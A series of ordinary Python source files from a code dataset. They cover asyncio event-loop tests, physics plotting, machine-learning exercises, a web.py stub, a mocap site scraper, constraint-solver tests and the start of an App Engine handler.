test_can_handle_exception_in_default_executor(loop):\n\t\"\"\"Verify that exceptions from tasks run in default (threaded) executor are handled.\"\"\"\n\tdef blocking_func():\n\t\traise Exception('Testing')\n\n\twith pytest.raises(Exception) as excinfo:\n\t\tloop.run_until_complete(loop.run_in_executor(None, blocking_func))\n\n\tassert str(excinfo.value) == 'Testing'\n\n\ndef test_can_execute_subprocess(loop):\n\t\"\"\"Verify that a subprocess can be executed.\"\"\"\n\ttransport, protocol = loop.run_until_complete(loop.subprocess_exec(\n\t\t_SubprocessProtocol, sys.executable or 'python', '-c', 'print(\\'Hello async world!\\')'))\n\tloop.run_forever()\n\tassert transport.get_returncode() == 0\n\tassert protocol.received_stdout == 'Hello async world!'\n\n\ndef test_can_terminate_subprocess(loop):\n\t\"\"\"Verify that a subprocess can be terminated.\"\"\"\n\t# Start a never-ending process\n\ttransport = loop.run_until_complete(\n\t\tloop.subprocess_exec(\n\t\t\t_SubprocessProtocol, sys.executable or 'python', '-c', 'import time\\nwhile True: time.sleep(1)',\n\t\t),\n\t)[0]\n\t# Terminate!\n\ttransport.kill()\n\t# Wait for process to die\n\tloop.run_forever()\n\n\tassert transport.get_returncode() != 0\n\n\ndef test_loop_running(loop):\n\t\"\"\"Verify that loop.is_running returns True when running\"\"\"\n\t@asyncio.coroutine\n\tdef is_running():\n\t\tnonlocal loop\n\t\tassert loop.is_running()\n\n\tloop.run_until_complete(is_running())\n\n\ndef test_loop_not_running(loop):\n\t\"\"\"Verify that loop.is_running returns False when not running\"\"\"\n\tassert not loop.is_running()\n\n\ndef test_can_function_as_context_manager(application):\n\t\"\"\"Verify that a QEventLoop can function as its own context manager.\"\"\"\n\twith quamash.QEventLoop(application) as loop:\n\t\tassert isinstance(loop, quamash.QEventLoop)\n\t\tloop.call_soon(loop.stop)\n\t\tloop.run_forever()\n\n\ndef test_future_not_done_on_loop_shutdown(loop):\n\t\"\"\"Verify RuntimError occurs when loop stopped before Future completed with run_until_complete.\"\"\"\n\tloop.call_later(1, loop.stop)\n\tfut = asyncio.Future()\n\twith pytest.raises(RuntimeError):\n\t\tloop.run_until_complete(fut)\n\n\ndef test_call_later_must_not_coroutine(loop):\n\t\"\"\"Verify TypeError occurs call_later is given a 
coroutine.\"\"\"\n\tmycoro = asyncio.coroutine(lambda: None)\n\n\twith pytest.raises(TypeError):\n\t\tloop.call_soon(mycoro)\n\n\ndef test_call_later_must_be_callable(loop):\n\t\"\"\"Verify TypeError occurs call_later is not given a callable.\"\"\"\n\tnot_callable = object()\n\twith pytest.raises(TypeError):\n\t\tloop.call_soon(not_callable)\n\n\ndef test_call_at(loop):\n\t\"\"\"Verify that loop.call_at works as expected.\"\"\"\n\tdef mycallback():\n\t\tnonlocal was_invoked\n\t\twas_invoked = True\n\twas_invoked = False\n\n\tloop.call_at(loop.time() + .1, mycallback)\n\tloop.run_until_complete(asyncio.sleep(.5))\n\n\tassert was_invoked\n\n\ndef test_get_set_debug(loop):\n\t\"\"\"Verify get_debug and set_debug work as expected.\"\"\"\n\tloop.set_debug(True)\n\tassert loop.get_debug()\n\tloop.set_debug(False)\n\tassert not loop.get_debug()\n\n\n@pytest.fixture\ndef sock_pair(request):\n\t\"\"\"Create socket pair.\n\n\tIf socket.socketpair isn't available, we emulate it.\n\t\"\"\"\n\tdef fin():\n\t\tif client_sock is not None:\n\t\t\tclient_sock.close()\n\t\tif srv_sock is not None:\n\t\t\tsrv_sock.close()\n\n\tclient_sock = srv_sock = None\n\trequest.addfinalizer(fin)\n\n\t# See if socketpair() is available.\n\thave_socketpair = hasattr(socket, 'socketpair')\n\tif have_socketpair:\n\t\tclient_sock, srv_sock = socket.socketpair()\n\t\treturn client_sock, srv_sock\n\n\t# Create a non-blocking temporary server socket\n\ttemp_srv_sock = socket.socket()\n\ttemp_srv_sock.setblocking(False)\n\ttemp_srv_sock.bind(('', 0))\n\tport = temp_srv_sock.getsockname()[1]\n\ttemp_srv_sock.listen(1)\n\n\t# Create non-blocking client socket\n\tclient_sock = socket.socket()\n\tclient_sock.setblocking(False)\n\ttry:\n\t\tclient_sock.connect(('localhost', port))\n\texcept socket.error as err:\n\t\t# Error 10035 (operation would block) is not an error, as we're doing this with a\n\t\t# non-blocking socket.\n\t\tif err.errno != 10035:\n\t\t\traise\n\n\t# Use select to wait for connect() to succeed.\n\timport select\n\ttimeout = 1\n\treadable = select.select([temp_srv_sock], [], [], timeout)[0]\n\tif temp_srv_sock not in readable:\n\t\traise Exception('Client socket not connected in {} second(s)'.format(timeout))\n\tsrv_sock, _ = temp_srv_sock.accept()\n\n\treturn client_sock, srv_sock\n\n\ndef test_can_add_reader(loop, sock_pair):\n\t\"\"\"Verify that we can add a reader callback to an event loop.\"\"\"\n\tdef can_read():\n\t\tif fut.done():\n\t\t\treturn\n\n\t\tdata = srv_sock.recv(1)\n\t\tif len(data) != 1:\n\t\t\treturn\n\n\t\tnonlocal got_msg\n\t\tgot_msg = data\n\t\t# Indicate that we're done\n\t\tfut.set_result(None)\n\t\tsrv_sock.close()\n\n\tdef write():\n\t\tclient_sock.send(ref_msg)\n\t\tclient_sock.close()\n\n\tref_msg = b'a'\n\tclient_sock, srv_sock = sock_pair\n\tloop.call_soon(write)\n\n\texp_num_notifiers = len(loop._read_notifiers) + 1\n\tgot_msg = None\n\tfut = asyncio.Future()\n\tloop.add_reader(srv_sock.fileno(), can_read)\n\tassert len(loop._read_notifiers) == exp_num_notifiers, 'Notifier should be added'\n\tloop.run_until_complete(asyncio.wait_for(fut, timeout=1.0))\n\n\tassert got_msg == ref_msg\n\n\ndef test_can_remove_reader(loop, sock_pair):\n\t\"\"\"Verify that we can remove a reader callback from an event loop.\"\"\"\n\tdef can_read():\n\t\tdata = srv_sock.recv(1)\n\t\tif len(data) != 1:\n\t\t\treturn\n\n\t\tnonlocal got_msg\n\t\tgot_msg = data\n\n\tclient_sock, srv_sock = sock_pair\n\n\tgot_msg = None\n\tloop.add_reader(srv_sock.fileno(), can_read)\n\texp_num_notifiers = 
len(loop._read_notifiers) - 1\n\tloop.remove_reader(srv_sock.fileno())\n\tassert len(loop._read_notifiers) == exp_num_notifiers, 'Notifier should be removed'\n\tclient_sock.send(b'a')\n\tclient_sock.close()\n\t# Run for a short while to see if we get a read notification\n\tloop.call_later(0.1, loop.stop)\n\tloop.run_forever()\n\n\tassert got_msg is None, 'Should not have received a read notification'\n\n\ndef test_can_add_writer(loop, sock_pair):\n\t\"\"\"Verify that we can add a writer callback to an event loop.\"\"\"\n\tdef can_write():\n\t\tif not fut.done():\n\t\t\t# Indicate that we're done\n\t\t\tfut.set_result(None)\n\t\t\tclient_sock.close()\n\n\tclient_sock, _ = sock_pair\n\tfut = asyncio.Future()\n\tloop.add_writer(client_sock.fileno(), can_write)\n\tassert len(loop._write_notifiers) == 1, 'Notifier should be added'\n\tloop.run_until_complete(asyncio.wait_for(fut, timeout=1.0))\n\n\ndef test_can_remove_writer(loop, sock_pair):\n\t\"\"\"Verify that we can remove a writer callback from an event loop.\"\"\"\n\tclient_sock, _ = sock_pair\n\tloop.add_writer(client_sock.fileno(), lambda: None)\n\tloop.remove_writer(client_sock.fileno())\n\tassert not loop._write_notifiers, 'Notifier should be removed'\n\n\ndef test_add_reader_should_disable_qsocket_notifier_on_callback(loop, sock_pair):\n\t\"\"\"Verify that add_reader disables QSocketNotifier during callback.\"\"\"\n\tdef can_read():\n\t\tnonlocal num_calls\n\t\tnum_calls += 1\n\n\t\tif num_calls == 2:\n\t\t\t# Since we get called again, the QSocketNotifier should've been re-enabled before\n\t\t\t# this call (although disabled during)\n\t\t\tassert not notifier.isEnabled()\n\t\t\tsrv_sock.recv(1)\n\t\t\tfut.set_result(None)\n\t\t\tsrv_sock.close()\n\t\t\treturn\n\n\t\tassert not notifier.isEnabled()\n\n\tdef write():\n\t\tclient_sock.send(b'a')\n\t\tclient_sock.close()\n\n\tnum_calls = 0\n\tclient_sock, srv_sock = sock_pair\n\tloop.call_soon(write)\n\n\tfut = asyncio.Future()\n\tloop.add_reader(srv_sock.fileno(), can_read)\n\tnotifier = loop._read_notifiers[srv_sock.fileno()]\n\tloop.run_until_complete(asyncio.wait_for(fut, timeout=1.0))\n\n\ndef test_add_writer_should_disable_qsocket_notifier_on_callback(loop, sock_pair):\n\t\"\"\"Verify that add_writer disables QSocketNotifier during callback.\"\"\"\n\tdef can_write():\n\t\tnonlocal num_calls\n\t\tnum_calls += 1\n\n\t\tif num_calls == 2:\n\t\t\t# Since we get called again, the QSocketNotifier should've been re-enabled before\n\t\t\t# this call (although disabled during)\n\t\t\tassert not notifier.isEnabled()\n\t\t\tfut.set_result(None)\n\t\t\tclient_sock.close()\n\t\t\treturn\n\n\t\tassert not notifier.isEnabled()\n\n\tnum_calls = 0\n\tclient_sock, _ = sock_pair\n\tfut = asyncio.Future()\n\tloop.add_writer(client_sock.fileno(), can_write)\n\tnotifier = loop._write_notifiers[client_sock.fileno()]\n\tloop.run_until_complete(asyncio.wait_for(fut, timeout=1.0))\n","sub_path":"tests/test_qeventloop.py","file_name":"test_qeventloop.py","file_ext":"py","file_size_in_byte":10675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"563058629","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 15 12:19:23 2019\r\n\r\n@author: jules.fillette\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\n#Nom du programme : PuitsQuantique\r\n\r\n#Auteurs : Arnaud Raoux, François Lévrier, Emmanuel Baudin et la prépa agreg de Montrouge\r\n#Adresse : Departement de physique de l'Ecole Normale Superieure\r\n#\t\t24 rue Lhomond\r\n#\t\t75005 
Paris\r\n#Contact : arnaud.raoux@ens.fr\r\n#\r\n#Année de création : 2016 \r\n#Version : 1.0\r\n\r\n#Liste des modifications\r\n#v 1.00 : 2016-03-01 Première version complète\r\n\r\n#Version de Python\r\n#3.4\r\n\r\n#LICENCE\r\n#Cette oeuvre, création, site ou texte est sous licence Creative Commons Attribution - Pas d'Utilisation Commerciale 4.0 International. Pour accéder à une copie de cette licence, merci de vous rendre à l'adresse suivante http://creativecommons.org/licenses/by-nc/4.0/ ou envoyez un courrier à Creative Commons, 444 Castro Street, Suite 900, Mountain View, California, 94041, USA.\r\n\r\n#Description : \r\n#Ce programme permet de représenter les niveaux d'énergie dans un puits quantique, ainsi que les fonctions d'onde correspondantes. Il est inspiré d'un programme détaillé dans les références.\r\n\r\n\r\n#import des bibliothèques python\r\nfrom pylab import *\r\nfrom scipy.integrate import odeint, simps # Pour la resolution d'equations differentielles\r\nfrom scipy.optimize import brentq # Pour trouver les zeros d'une fonction\r\n\r\n# =============================================================================\r\n# --- References ------------------------------------------------\r\n# =============================================================================\r\n\r\n## Griffiths, Introduction to Quantum Mechanics, 1st edition, page 62.\r\n## https://helentronica.wordpress.com/2014/09/04/quantum-mechanics-with-the-python/\r\n\r\n# =============================================================================\r\n# --- Definitions ------------------------------------------------\r\n# =============================================================================\r\n\r\n\r\nN = 1000 # Discrétisation du puits\r\npsi = np.zeros([N,2]) # Vecteur contenant [psi, psi']\r\npsi0 = array([0,1]) # Condition initiale pour psi0\r\nVo = 10 # Hauteur du puits quantique\r\nE = 0.0 # Variable globale amenée à changer\r\nb = 2 # Point en dehors du puits pour vérifier si la fonction diverge\r\nx = linspace(-b, b, N) # Abscisses\r\nL=1 # Largeur du puits\r\n\r\n# =============================================================================\r\n# --- Fonctions intermediaires ------------------------------------------------\r\n# =============================================================================\r\n\r\ndef V(x):\r\n \"\"\"\r\n Potentiel du puits quantique. L est la largeur du puits, et Vo la hauteur\r\n \"\"\"\r\n if abs(x) < L:\r\n return 0\r\n else:\r\n return Vo\r\n\r\ndef SE(psi, x):\r\n \"\"\"\r\n Fonction qui renvoie le vecteur (psi',psi'') grâce a l'équation de Schroöinger\r\n \"\"\"\r\n state0 = psi[1]\r\n state1 = 2.0*(V(x) - E)*psi[0]\r\n return array([state0, state1])\r\n \r\ndef Wave_function(energy):\r\n \"\"\"\r\n Calcule la fonction d'onde solution de l'équation de Schrödinger, et renvoie sa valeur en b\r\n \"\"\"\r\n global psi,E\r\n \r\n E = energy\r\n psi = odeint(SE, psi0, x)\r\n norm = simps(psi[:,0]**2,x)\r\n psi = psi/np.sqrt(norm)\r\n return psi[-1,0]\r\n \r\ndef find_all_zeroes(x,y):\r\n \"\"\"\r\n Donne tous les zéros de y = Psi(x)\r\n \"\"\"\r\n all_zeroes = []\r\n s = sign(y)\r\n for i in range(len(y)-1):\r\n if s[i]+s[i+1] == 0:\r\n zero = brentq(Wave_function, x[i], x[i+1])\r\n all_zeroes.append(zero)\r\n return all_zeroes\r\n\r\ndef find_analytic_energies(en):\r\n \"\"\"\r\n Calcule les énergies du puits carre. cf. 
Griffiths, Introduction to Quantum Mechanics, 1st edition, page 62.\r\n \"\"\"\r\n z = sqrt(2*en)\r\n z0 = sqrt(2*Vo)\r\n z_zeroes = []\r\n f_sym = lambda z: tan(z)-sqrt((z0/z)**2-1) # Equation implicite pour les valeurs symétriques\r\n f_asym = lambda z: -1/tan(z)-sqrt((z0/z)**2-1) # Equation implicite pour les valeurs antisymétriques\r\n \r\n # Pour les fonctions d'onde symétriques\r\n s = sign(f_sym(z))\r\n for i in range(len(s)-1):\r\n if s[i]+s[i+1] == 0:\r\n zero = brentq(f_sym, z[i], z[i+1])\r\n z_zeroes.append(zero)\r\n \r\n # Pour les fonctions d'onde antisymétriques\r\n z_zeroes = []\r\n s = sign(f_asym(z))\r\n for i in range(len(s)-1): # find zeroes of this crazy function\r\n if s[i]+s[i+1] == 0:\r\n zero = brentq(f_asym, z[i], z[i+1])\r\n z_zeroes.append(zero)\r\n\r\n# =============================================================================\r\n# --- Fonction principale (main loop) ------------------------------------------\r\n# =============================================================================\r\n\r\ndef main():\r\n \"\"\"\r\n L'idée est de scanner toutes les énergies entre 0 et 100Vo, et de chercher celles dont la fonction d'onde vaut 0 loin à l'intérieur du puits (en x=b).\r\n \"\"\" \r\n \r\n en = linspace(0.1, Vo, 100) # Energies que l'on va investiguer pour trouver les états propres\r\n psi_b = [] # Vecteur contenant les valeurs en x=b\r\n \r\n for e1 in en:\r\n psi_b.append(Wave_function(e1)) \r\n E_zeroes = find_all_zeroes(en, psi_b) # On ne sélectionne que les énergies telles que la fonction d'onde vaut 0 en x=b\r\n \r\n # =============================================================================\r\n # --- Création de la figure ------------------------------------------\r\n # =============================================================================\r\n f, ax = subplots(2, sharex=True) # La figure sera composée de deux sous-figures\r\n \r\n f.suptitle(\"Particule dans un puits fini\", fontsize=22)\r\n \r\n ## Energies\r\n \r\n ax[1].set_title('Energies propres', fontsize=18)\r\n ax[1].set_ylim(-0.2,1.5)\r\n ax[1].set_ylabel(r'$\\frac{E}{V_0}$',rotation='horizontal',fontsize=24)\r\n ax[1].set_xlim(-2,2)\r\n ax[1].set_xlabel(r'$\\frac{x}{a}$',fontsize=24)\r\n \r\n for E in E_zeroes:\r\n ax[1].plot(linspace(-1,1,50), E*ones(50)/Vo, label=\"E = %.2f\"%E)\r\n \r\n #Dessin du puits\r\n l1=ax[1].plot(linspace(-2,-1,50),ones(50),-1*ones(50),linspace(0,1,50),linspace(-1,1,50),0*ones(50)/Vo,1*ones(50),linspace(0,1,50),linspace(1,2,50),ones(50))\r\n plt.setp(l1, linewidth=2, color='k')\r\n \r\n #Pointillés\r\n l2=ax[1].plot(-1*ones(50),linspace(-0.5,1.5,50),1*ones(50),linspace(-0.5,1.5,50))\r\n plt.setp(l2, linewidth=0.5, color='k',linestyle='--')\r\n\r\n ## Fonctions d'onde\r\n \r\n for E in E_zeroes:\r\n Wave_function(E)\r\n ax[0].plot(x, psi[:,0], label=\"E = %.2f\"%E)\r\n\r\n ax[0].set_title(\"Fonctions d'onde propres\",fontsize=18)\r\n ax[0].set_ylim(-1.2,1.5)\r\n ax[0].set_ylabel(r'$\\varphi(x)$', rotation='horizontal', fontsize = 15)\r\n \r\n # Pointillés\r\n l3=ax[0].plot(-1*ones(50),linspace(-300,300,50),1*ones(50),linspace(-300,300,50),zorder=20)\r\n plt.setp(l3, linewidth=1, color='k',linestyle='--')\r\n\r\n #Ligne 0\r\n l4=ax[0].plot(linspace(-2,2,2),[0]*2,zorder=30)\r\n plt.setp(l4, linewidth=0.5, color='k', 
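# styles the psi = 0 baseline (l4) drawn under the plotted wavefunctions\r\n        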
linestyle='-')\r\n\r\n\r\nmain()\r\nshow()\r\n#input()\r\n\r\n\r\n\r\n","sub_path":"Lecons_jules/Python/FonctionOnde_PuitsQuantique.py","file_name":"FonctionOnde_PuitsQuantique.py","file_ext":"py","file_size_in_byte":7405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"296763156","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import Isomap\n\nx = pd.read_csv('Datasets/parkinsons.data')\ny = x['status'].copy()\nx.drop(labels=['name', 'status'], axis=1, inplace=True)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7)\nsvc = SVC()\nsvc.fit(x_train, y_train)\nscore = svc.score(x_test, y_test)\nprint('Score: %f' % score)\n\nscaler = preprocessing.StandardScaler()\nscaler.fit(x_train)\nx_train = scaler.transform(x_train)\nx_test = scaler.transform(x_test)\n\nfor n_components in range(4, 7):\n for n_neighbors in range(2, 6):\n # model = PCA(n_components=n_components)\n model = Isomap(n_neighbors=n_neighbors, n_components=n_components)\n model.fit(x_train)\n x_train_pca = model.transform(x_train)\n x_test_pca = model.transform(x_test)\n\n best_score = 0\n for c in np.arange(0.05, 2.05, 0.05):\n for gamma in np.arange(0.001, 0.101, 0.001):\n svc = SVC(kernel='rbf', C=c, gamma=gamma)\n svc.fit(x_train_pca, y_train)\n score = svc.score(x_test_pca, y_test)\n if score > best_score:\n best_score = score\n\n print('Best score: %f' % best_score)\n","sub_path":"Module6/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"607714203","text":"import web\n\nfrom web.template import ALLOWED_AST_NODES\nALLOWED_AST_NODES.append('Constant')\n\nurls = (\n '/alumnos?', 'application.controllers.alumnos.Alumnos' #el simbolo ? 
inidca que recibira variables en la URL\n)\napp = web.application(urls, globals())\n\n#render = web.template.render('templates/') #dice que la carpeta de las paginas web sera templates\n\nif __name__ == \"__main__\":\n web.config.debug = True\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"43556017","text":"# class Roman:\n# def __init__(self,number):\n# self.number=number\n# def convert(self):\n# pass\nclass Romandigit:\n def convertroman(self,no):\n digit=[1000,900,500,400,100,90,50,40,10,9,5,4,1]\n romanNo=['M','CM','D','CD','C','XC','L','XL','X','IX','V','IV','I']\n romandigit=''\n k=0\n while no>0:\n for _ in range(no//digit[k]):\n romandigit+=romanNo[k]\n no-=digit[k]\n k+=1\n return romandigit\n\nprint(Romandigit().convertroman(34))\nprint(Romandigit().convertroman(120))\nprint(Romandigit().convertroman(4))\nprint(Romandigit().convertroman(1847))\n\nclass Sozumuz:\n word=''\n # def __init__(self,word):\n # self.word=word\n def get_string(self):\n self.word=input(\"soz daxil edin:\")\n def print_string(self):\n print(self.word.upper())\nstring1=Sozumuz()\nstring1.get_string()\nstring1.print_string()\n\nclass Pow:\n # def __init__(self,x,n):\n # self.x=x\n # self.n=n\n \n def pow(self,x,n):\n # self.x=x\n # self.n=n\n return x**n\n\npow1=Pow()\nprint(pow1.pow(5,2))\n\nclass Reverse:\n words=\"\"\n def reverse_words(self,):\n self.words = input(\"metn daxil edin: \")\n mylist=self.words.split()\n mylist.reverse()\n for i in mylist:\n print(i,end=\" \")\n print()\n\nobject1=Reverse()\n\nobject1.reverse_words()\n","sub_path":"01-Warmup/classroomtask1.py","file_name":"classroomtask1.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"414009752","text":"import requests\nimport warnings\nfrom html.parser import HTMLParser\n\nclass CMUHTMLSubjectParser(HTMLParser):\n \n def __init__(self):\n super().__init__()\n self.reset_all()\n \n self.subject_number = 1\n self.data_idx = 0\n self.data_ignore = [\n '\\'', '\\n\\n', 'tvd', 'c3d', \n 'mpg', 'Animated', 'Feedback'\n ]\n \n def reset_all(self):\n self.reset()\n self.master = {}\n self.tr_enabled = False\n self.data_enabled = False\n self.data_zero = None\n self.cur_url = None\n self.data = ['' for _ in range(4)]\n self.list_comp = self.data[:] \n self.data_idx = 0\n \n def set_subject(self, subject_num):\n self.subject_number = subject_num\n self.master[\"Subject\"] = subject_num\n \n def handle_starttag(self, tag, attrs):\n if tag == 'tr': \n self.tr_enabled = True\n \n if not self.tr_enabled:\n return\n \n if tag == 'a':\n if len(attrs) == 1:\n url = attrs[0][1]\n toks = url.split('.')\n if toks[-1] == 'asf':\n self.master['asf'] = url.encode('utf-8')\n \n self.cur_url = attrs[0][1]\n \n def handle_data(self, data):\n if self.tr_enabled:\n self.data_zero = data\n if isinstance(self.data_zero, str):\n if self.data_zero.isnumeric():\n self.data_enabled = True\n \n if not self.data_enabled:\n return \n \n if data in self.data_ignore:\n return\n \n if self.data_idx == 2:\n self.data[self.data_idx] = self.cur_url\n else:\n self.data[self.data_idx] = data\n \n self.data_idx += 1\n \n def handle_endtag(self, tag):\n if tag == 'tr':\n self.tr_enabled = False\n if self.data != self.list_comp: \n d = {\n 'Category': None,\n 'Description': self.data[1],\n 'amc': self.data[2].encode('utf-8'),\n 'FrameRate': 
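# frame rate parsed as an int from the fourth collected table cell\n                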
int(self.data[3])\n }\n \n trial = 'Trial{0}'.format(self.data[0])\n self.master[trial] = d\n \n self.data = self.list_comp[:]\n self.data_enbaled = False\n self.data_idx = 0\n \n\nclass CMUScanner(object):\n \n def __init__(self):\n self.html_parser = CMUHTMLSubjectParser()\n self.base_url = 'http://mocap.cs.cmu.edu/search.php?subjectnumber={0}'\n self.allowed_subjects = [snum for snum in range(1, 145)]\n \n def __get_url_content(self, num):\n url = self.base_url.format(num)\n resp = requests.get(url, allow_redirects=True)\n \n cont_t = resp.headers.get('content-type')\n assert cont_t == 'text/html', \"Invalid content {0}\".format(cont)\n \n return str(resp.content)\n \n def __parse_html(self, html):\n self.html_parser.feed(html)\n return dict(self.html_parser.master)\n \n def scan_cmu(self, subject_number=1):\n if subject_number not in self.allowed_subjects:\n warnings.warn(\n \"Subject number not allowed, using default (1)\"\n )\n subject_number = 1\n \n self.html_parser.reset_all()\n \n self.html_parser.set_subject(subject_number)\n cont = self.__get_url_content(subject_number)\n return self.__parse_html(cont)\n","sub_path":"pymoco/cmuscanner.py","file_name":"cmuscanner.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"128007437","text":"import numpy as np\r\nimport scipy.io as sio\r\n\r\nf1 = open('word_list_unstem4.txt','r')\r\nwords_str = f1.readline()\r\nwords_list = words_str.split()\r\nfeature_length = len(words_list)\r\nf1.close()\r\n\r\n## 用10000个词汇来表示25000条负极的影评句子\r\nf2 = open('token_data_neg.txt','r')\r\nmatrix_doc_neg = np.zeros((25000,feature_length))\r\nfor line in range(25000):\r\n sentance = f2.readline()\r\n sentance_list = sentance.split()\r\n for i in range(len(sentance_list)):\r\n for j in range(len(words_list)):\r\n if sentance_list[i] == words_list[j]:\r\n matrix_doc_neg[line][j] = 1\r\n break\r\n\r\nf2.close()\r\n\r\n## 用XX个词汇来表示25000条正极的影评句子\r\nf3 = open('token_data_pos.txt','r')\r\nmatrix_doc_pos = np.zeros((25000,feature_length))\r\nfor line in range(25000):\r\n sentance = f3.readline()\r\n sentance_list = sentance.split()\r\n for i in range(len(sentance_list)):\r\n for j in range(len(words_list)):\r\n if sentance_list[i] == words_list[j]:\r\n matrix_doc_pos[line][j] = 1\r\n break\r\n\r\nf3.close()\r\n\r\n## partioning 分training set & test set\r\n# 25000 neg & 25000 pos\r\n# 按7:3分割,17500*2 : 7500*2\r\nk1 = np.random.permutation(25000)\r\nk2 = np.random.permutation(25000)\r\ntrain_neg = np.zeros((17500,feature_length))\r\ntest_neg = np.zeros((7500,feature_length))\r\nfor i in range(17500):\r\n train_neg[i] = matrix_doc_neg[k1[i]]\r\nfor i in range(7500):\r\n test_neg[i] = matrix_doc_neg[17500 + k1[i + 17500]]\r\n\r\ntrain_pos = np.zeros((17500,feature_length))\r\ntest_pos = np.zeros((7500,feature_length))\r\nfor i in range(17500):\r\n train_pos[i] = matrix_doc_pos[k1[i]]\r\nfor i in range(7500):\r\n test_pos[i] = matrix_doc_pos[17500 + k1[i + 17500]]\r\n# training set, 标记分两类,第一类为positive, 第二类为negative, 数量相等\r\ntrain_set = np.zeros(17500 * 2, feature_length)\r\ntrain_set[0:17500] = train_neg\r\ntrain_set[17500:] = train_pos\r\nk3 = np.random.permutation(17500 * 2)\r\ntrain_x = np.zeros(17500 * 2, feature_length)\r\nfor i in range(17500*2):\r\n train_x[i] = train_set[k3[i]]\r\ntrain_y = np.zeros(17500*2, 2)\r\nfor i in range(17500*2):\r\n if k3[i] >= 17500:\r\n train_y[i][0] = 1\r\n else:\r\n train_y[i][1] = 1\r\n \r\n# test set,标记分两类,第一类为positive, 第二类为negative, 
数量相等\r\ntest_set = np.zeros(7500 * 2, feature_length)\r\ntest_set[0:7500] = test_neg\r\ntest_set[7500:] = test_pos\r\nk4 = np.random.permutation(7500 * 2)\r\ntest_x = np.zeros(7500 * 2, feature_length)\r\nfor i in range(7500*2):\r\n test_x[i] = test_set[k4[i]]\r\ntest_y = np.zeros(7500*2, 2)\r\nfor i in range(7500*2):\r\n if k4[i] >= 7500:\r\n test_y[i][0] = 1\r\n else:\r\n test_y[i][1] = 1\r\n\r\n\r\nsio.savemat('savelongdata.mat',{'train_x':train_x, 'train_y':train_y, 'test_x':test_x, 'test_y':test_y})\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Sentiment-Analysis/彬彬/bag_of_word2.0/bow_train_test.py","file_name":"bow_train_test.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647967161","text":"import pytest\nfrom csp import (\n FunctionConstraint,\n ConstraintNotAFunction,\n ConstraintMissingArguments,\n ConstraintUnexpectedArguments\n)\n\n\ndef constraint_1(a):\n return a**2 < 4\n\n\ndef constraint_2(a, b):\n return a*2 < b\n\n\ndef test_ConstraintNotAFunction():\n fake_constraint = 'this is a string'\n\n with pytest.raises(ConstraintNotAFunction):\n FunctionConstraint(fake_constraint, ['a'])\n\n\ndef test_constraint_1():\n\n FunctionConstraint(constraint_1, ['a'])\n\n with pytest.raises(ConstraintMissingArguments):\n FunctionConstraint(constraint_1, ['b'])\n\n with pytest.raises(ConstraintUnexpectedArguments):\n FunctionConstraint(constraint_1, ['a', 'b'])\n\n\ndef test_constraint_2():\n\n FunctionConstraint(constraint_2, ['a', 'b'])\n FunctionConstraint(constraint_2, ['b', 'a'])\n\n with pytest.raises(ConstraintMissingArguments):\n # Missing 1 argument\n FunctionConstraint(constraint_2, ['a'])\n\n with pytest.raises(ConstraintMissingArguments):\n # Missing 1 argument\n FunctionConstraint(constraint_2, ['b'])\n\n with pytest.raises(ConstraintMissingArguments):\n # Missing 2 argument\n FunctionConstraint(constraint_2, ['c'])\n\n with pytest.raises(ConstraintUnexpectedArguments):\n FunctionConstraint(constraint_2, ['a', 'b', 'c'])\n\n with pytest.raises(ConstraintUnexpectedArguments):\n FunctionConstraint(constraint_2, ['c', 'b', 'a'])\n\n\ndef test_constraint_2_satisfied():\n c = FunctionConstraint(constraint_2, ['a', 'b'])\n assignment_1 = {\n 'a': 2,\n 'b': 5\n }\n \n assert c.satisfied(assignment_1)\n\n assignment_2 = {\n 'a': 2,\n 'b': 4\n }\n \n assert not c.satisfied(assignment_2)","sub_path":"tests/test_FunctionConstraint.py","file_name":"test_FunctionConstraint.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479912484","text":"# -*- coding: utf-8 -*-\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.dist import use_library\nfrom google.appengine.api import users\n\n\nclass ApplicationHandler(webapp.RequestHandler):\n \"\"\"Base class for all handlers.\n\n Add there methods/helpers that can be used by all handlers,\n such as greetings, logout messages, etc.\"\"\"\n def CommonValues(self):\n values = {}\n values[\"tabs\"] = [\n dict(text=\"Acceuil\", url=\"/\",rel=\"\"),\n dict(text=\"Classements\", url=\"/ranking\",rel=\"\"),\n dict(text=\"Questions\", url=\"/questions\",rel=\"\"),\n ]\n if not users.get_current_user():\n values[\"tabs\"].append(dict(text=\"Login\",\n url=users.create_login_url(\"/\"),rel=\"#overlay\"))\n else:\n values[\"tabs\"].append(dict(text=\"Mon profil\",\n url=\"/profile\"))\n values[\"tabs\"].append(dict(text=\"Déconnecter\",\n 
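# logout tab: only built when get_current_user() returned a signed-in user above\n            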
